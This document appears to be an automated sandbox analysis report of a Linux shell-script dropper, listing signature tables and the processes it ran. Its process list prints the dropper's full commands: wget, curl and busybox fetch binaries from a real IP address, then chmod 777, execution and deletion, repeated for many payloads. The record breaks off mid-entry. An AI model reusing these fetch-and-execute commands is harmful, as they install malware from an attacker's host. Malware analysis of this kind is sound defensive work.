Analysis Overview
SHA256
7a530aad038bbecbf77ba76fbb1d21207ddaada0b487c2ec2ae30bb52e362c1a
Threat Level: Shows suspicious behavior
The file 2867f6118ccdde38169e7da22f50cedd.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 01:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
28s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
